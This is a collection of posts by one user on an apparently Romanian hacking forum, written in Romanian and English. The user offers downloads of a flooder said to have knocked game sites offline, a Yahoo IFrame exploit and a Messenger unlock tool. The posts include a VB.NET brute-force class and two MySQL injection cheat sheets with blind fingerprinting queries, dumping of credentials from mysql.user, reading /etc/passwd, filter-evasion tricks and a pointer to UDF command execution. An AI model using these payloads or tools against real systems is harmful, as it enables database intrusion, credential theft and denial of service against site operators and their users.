Mecanik

Ok,dar nu asa,imi arata ca sunt 100 si ceva de MII de useri,si 150 on. Mai bine taci.(ca e mai bine)

CHERIC | ???? | ??DB | ??? ?? CHERIC | ???? | ??DB | ??? ?? This is not a solve. This is just a little help for others.

Comentarii bune,altele aiurea,altele rele... Toti au dreptul sa isi zica parerea. /* REMOVED DUE TO SOME ERROR */ Word Wide Web-u este liber ca pasarea,Google este prietenul nostru! Cine vrea sa se alature Echipei e bine venit,cine nu sa mearga tare! @ AlStar : Tu ce incerci sa demonstrezi aici ? ca RST are in momentul asta: Useri: 111,393 Si Online sunt: There are currently 151 users online. 67 members and 84 guests Fa tu calculu,ca poate eu gresesc...

Deci marea "rezolvare" a codului complet derutativ...si fara sens: te va aduce aici-Click Me- Si este o vrajeala mare in acel cod,asta va zic sincer. Parola nu o sa va zic,deoarece ar strica "farmecul" acelui site Un lucru este cert: Niciodata nu veti ajunge sa lucrati pentru ei; Dupa parerea mea a fost doar un test pentru hackeri,care sa isi piarda timpul degeaba,sa isi manance nervii etc...

Nu stiu ce ai tu cu mine,dar daca asa sta treaba lasa ca nu mai postez nimik... Si termina cu virusii tai,cred ca numai virusi ai in cap...

de ce nu va merge defapt? am sa revin cu video...

Ia frate 150 de boti de aici : >Click< Relax...

Ho fratilor,ce virus? va fac print sa vedeti ca am NOD32 5? Asta e primul program facut,e clean tot. Si da ai nevoie de .Net Framework 4

Va prezint un flooder care a fost recodat de mine,si care merge 100% pe siteuri care sunt hostate pe windows. A fost testat,am reusit sa "pic" site-uri de metin2,dofus,wow. Desigur cu timpul il voi face si mai avansat. Mentionez ca foloseste o cantitate moderata de resurse [CPU mai ales] Pentru a rula programul aveti nevoi de: mswinsck.ocx msinet.ocx mscomctl.ocx comdlg32.ocx KewlButtonz.ocx Toate le gasiti in Flooder.zip,trebuie sa dati doar pe "Register.bat" si gata. >Descarca< Enjoy Guys!

Va prezint primul program IFrame Exploit [pe urma a fost codat Y!Disruption] E foarte usor de folosit,si inca merge Yahoo_IFrame_Exploit.rar >Descarca< Daca vreti si Y!Disruption,postati si veti primii.

Ti`a blocat cineva ID-ul de mess pe 24 de ore? Nimic mai simplu: YMSG-HTTP_Acc._Unlocker.rar >Descarca< Va dau versiunea asta ca din cate stiu nu are nevoie de anumite ocx-uri[le am toate posibile],dar in caz ca vil cere,nu ezitati sa postati aici! Bafta!

/*Aveti nevoie de cunostinte in VB/* A VB.Net class on how to perform a string based permutation. Also known as "bruteforce". Good to have. It's not around on the net, so i chose to publish it. Option Explicit On Option Strict On Public Class Permutation Private _Charset As String = vbNullString Private _IndexArray(_Max) As Integer Private _Max As Short = &H1 Private _Min As Short = &H0 Private _TimePerCalculation As Double = &H0 Private _Estimater As UInt16 = &H0 Private _Watch As New Stopwatch Public Sub New(ByVal Charset As String, ByVal Max As Short, _ ByVal Min As Short) _Charset = Charset _Max = Max _Min = Min ReDim _IndexArray(_Max) For Nullifier As Integer = &H0 To (_Min - &H1) _IndexArray(Nullifier) = &H1 Next _Watch.Start() End Sub Public Sub Add() _IndexArray(&H0) = _IndexArray(&H0) + &H1 For Index As Short = &H0 To CShort(_Max - &H1) If (_IndexArray(Index) > &H0) And _ (_IndexArray(Index) > Len(_Charset)) Then _IndexArray(Index) = &H1 _IndexArray(Index + &H1) = _IndexArray(Index + &H1) + &H1 End If Next Index End Sub Public Function GenerateString(Optional ByVal AddToNextTurn As Boolean = True) As String _Estimater = CUShort(_Estimater + &H1) If _Estimater Mod UInt16.MaxValue = &H0 Then _TimePerCalculation = (_Watch.ElapsedMilliseconds / UInt16.MaxValue) _Watch.Reset() _Watch.Start() _Estimater = &H0 End If Dim Result As String = vbNullString For Index As Short = &H0 To _Max If _IndexArray(Index) <> &H0 Then Result = Result & Mid(_Charset, _IndexArray(Index), &H1) End If Next If AddToNextTurn = True Then Add() Return Result End Function Public ReadOnly Property GetExitValue() As Double Get Dim Result As Double = &H0 For Index As Integer = _Min To _Max Result += (Len(_Charset) ^ Index) Next Return Result End Get End Property Public ReadOnly Property GetExitString() As String Get Return New String(CChar(_Charset.Substring(_Charset.Length - &H1, &H1)), _Max) End Get End Property Public ReadOnly Property TimePerCalculation() As Double Get Return _TimePerCalculation End Get End Property Public Function MakeMD5(ByVal Word As String) As String Dim MD5 As New System.Security.Cryptography.MD5CryptoServiceProvider Dim ByteHash() As Byte Dim Result As String = vbNullString ByteHash = MD5.ComputeHash(System.Text.Encoding.ASCII.GetBytes(Word)) For Index As Integer = &H0 To &HF Result &= ByteHash(Index).ToString("x").PadLeft(&H2, CChar("0")) Next Return Result End Function End Class The New sub specifies the charset, the minimum and maximum length to use. Every time you call the GenerateString() function, it will return a new permutated value. Also, in order to determine when you're done or not. You can use neither the GetExitString() function, and see if it matches with the GenerateString() or if the number of permutations made by GenerateString() is equal to the GetExitValue(). Il puteti descarca direct de la 1 sursa de a mea,acest va ramane definitiv,deci il puteti descarca oricand Descarca - bruteforce.vb

/*Din nou daca nu este locul potrivit pentru acest post,rog un admin sa il mute la locul corespunzator./* Salvati aceasta lista! Este esential sa ai toate aceste functii intr-un singur loc! Aveti Nevoie de putina engleza din nou: [fara engleza,nu poti face MySqlInject ] A couple of useful blind queries to fingerprint the database. All of these return either True or False, as in, you either get a result or you don't. Version: SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5 SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4 Running as root: SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1 Got File_priv: SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1 Got Super_priv (Are we DBA): SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37))) LIMIT 0,1)=CHAR(89),1,0)=1 Can MySQL Sleep: #This query will return True and should take above 1 second to execute. If it's a success. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1 Can MySQL Benchmark: SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1 Are we on *NIX: SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47 Are we on Windows: SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1 Do a certain column exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0 Do a certain table exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0 Do a certain database exist: SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0 SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0

/*Dupa parerea mea am postat bine aici,daca nu rog un admin sa il mute unde considera el ca trebuie./* Iata va prezint un Cheat Sheet pe care orice hacker trebuie sa le aibe, Se folosesc la MySql Inject. Aceste sunt functii importante,toate intr-un loc: Trebuie sa stiti si putina engleza,altfel nu aveti sanse de MySql Inject Version: SELECT VERSION() SELECT @@version SELECT @@version_comment SELECT @@version_compile_machine SELECT @@version_compile_os Directories: SELECT @@basedir SELECT @@tmpdir SELECT @@datadir Users: SELECT USER() SELECT SYSTEM_USER() SELECT SESSION_USER() SELECT CURRENT_USER() Current Database: SELECT DATABASE() Concatenation: SELECT CONCAT('foo','.','bar'); #Returns: foo.bar SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world! Multi-Concat: #Stacks the row "foo" from the table "bar" together, using the separator "<br />". #Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT. #The 1024 byte limit is stored in the @@group_concat_max_len variable. SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar Better-Concat: #CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT(). #Which therefor allows you to concat strings together up to the @@max_allowed_packet size, #instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to #1048576 bytes, instead of @@group_concat_max_len's 1024. SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1))) Change Collation: SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation. SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8. Wildcards in SELECT(s): SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test". SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test". Regular Expression in SELECT(s): #Returns all columns matching the regular expression. SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*' SELECT Without Dublicates: SELECT DISTINCT foo FROM bar Counting Columns: SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar". Get Amount of MySQL Users: SELECT COUNT(user) FROM mysql.user Get MySQL Users: SELECT user FROM mysql.user Get MySQL User Privileges: SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges Get MySQL User Privileges on Different Databases: SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privileges Get MySQL User Privileges on Different Columns: SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privileges Get MySQL User Credentials & Privileges: SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv, Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv, File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv, Repl_client_priv) FROM mysql.user Get MySQL DBA Accounts: SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER' SELECT host,user FROM mysql.user WHERE Super_priv='Y' Get Databases: SELECT schema_name FROM information_schema.schemata SELECT DISTINCT db FROM mysql.db SELECT DISTINCT table_schema FROM information_schema.columns SELECT DISTINCT table_schema FROM information_schema.tables Get Databases & Tables: SELECT table_schema,table_name FROM information_schema.tables SELECT DISTINCT table_schema,table_name FROM information_schema.columns Get Databases, Tables & Columns: SELECT table_schema,table_name,column_name FROM information_schema.columns SELECT A Certain Row: SELECT foo FROM bar LIMIT 0,1; #Returns row 0. SELECT foo FROM bar LIMIT 1,1; #Returns row 1. ... SELECT foo FROM bar LIMIT N,1; #Returns row N. Benchmark (Heavy Query): #Performs an MD5 calculation of "1" for 10000 times. SELECT BENCHMARK(10000,MD5(1)) Sleep: #Works only in MySQL 5 and above. #Sleeps for 5 seconds, returns 0 on success. SELECT SLEEP(5) Conversion (Casting): SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1 SELECT CAST('65' AS CHAR); #Returns: A Substring: SELECT SUBSTR('foobar',1,3); #Returns: foo Hexadecimal Evasion: SELECT 0x41424344; #Returns: ABCD SELECT 0x2E; #Returns: . SELECT 0x3A; #Returns: : ASCII to Number: SELECT ASCII('A'); #Returns: 65 Number to ASCII: SELECT CHAR(65); #Returns: A SELECT CHAR(89); #Returns: Y SELECT CHAR(116,101,115,116); #Returns: test If Statement: #Returns 1 if the database is running MySQL 5. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0); #Returns 1 if the database is running MySQL 4. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0); Case Statement: #Returns 1 if the database is running MySQL 5. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END #Returns 1 if the database is running MySQL 4. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END Read File(s): #Requires you to have the File_priv in mysql.user. On error this statement will return NULL. SELECT LOAD_FILE('/etc/passwd') Write File(s): #You must use quotes on the filename! SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt' SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hello World') Logical Operator(s): AND, &&; #The AND operator have && as an alternative syntax. OR, ||; #The OR operator have || as an alternative syntax. NOT, !; #The NOT operator have ! as an alternative syntax. XOR; #The XOR operator got no alternative syntax. Fuzzy Code Comment: #Code within /*! are getting executed by MySQL. Additional /*! can be used instead of space as evasion. SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/ Comments: SELECT foo, bar FROM foo.bar-- Single line comment SELECT foo, bar FROM foo.bar/* Multi line comment */ SELECT foo, bar FROM foo.bar# Single line comment SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-byte. It do not work together with PHP though. A few evasions/methods to use between your MySQL statements: CR (%0D); #Carrier Return. LF (%0A); #Line Feed. Tab (%09); #The Tab-key. Space (%20); #Most commonly used. You know what a space is. Multiline Comment (/**/); #Well, as the name says. Fuzzy Comment (/*!); #Be sure to end your query with (*/) Parenthesis, ( and ); #Can also be used as separators when used right. Parenthesis instead of space: #As said two lines above, the use of parenthesis can be used as a separator. SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2)) Auto-Casting to Right Collation: SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s) to the current collation. DNS Requests (OOB (Out-Of-Band)): Command Execution: #If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA. #It can be done if you're able to upload a shared object into /usr/lib. #The file extension is .so, and it must contain an "User Defined Function", UDF. #Get raptor_udf.c, it's the source-code for just that feature. #Remember to compile it for the right CPU Architecture. #The CPU architecture can be resolved by this query: SELECT @@version_machine;

Salutare RST! Dupa ceva timp de cand urmaresc acest forum,si nu eram hotarat daca sa ma alatur si eu sau nu Astazi m-am decis sa ma alatur si eu voua aici pe RST! Este o mare placere sa fiu alatur de voi pe acest forum! Nu o sa am mult timp pentru activitate,deoarece mai am si o viata reala,dar am sa fac sa fiu la dispozitia voastra cat pot eu de mult Din pacate nu am reusit sa imi iau nick-ul meu original dizzy,da eu sunt cel original,desi pe net mai gasiti la dizzy in prostie...prietenii mai vechi ma recunosc Cunostinte: domeniu programare(PHP,XML, baza de date Sql -avansat) detin trackere codate de mine,zeci de siteuri,host etc.. C++,Visual C,Visual Basic -avansat (am facut multe hackuri/exploituri care sau dus peste pe net) Mentionez - Am venit aici nu sa cer ajutor,am venit sa ajut pe cei care vor sa invete (cele mai specificate de sus); Ajut pe oricine cu mare placere,doar sa imi permita timpul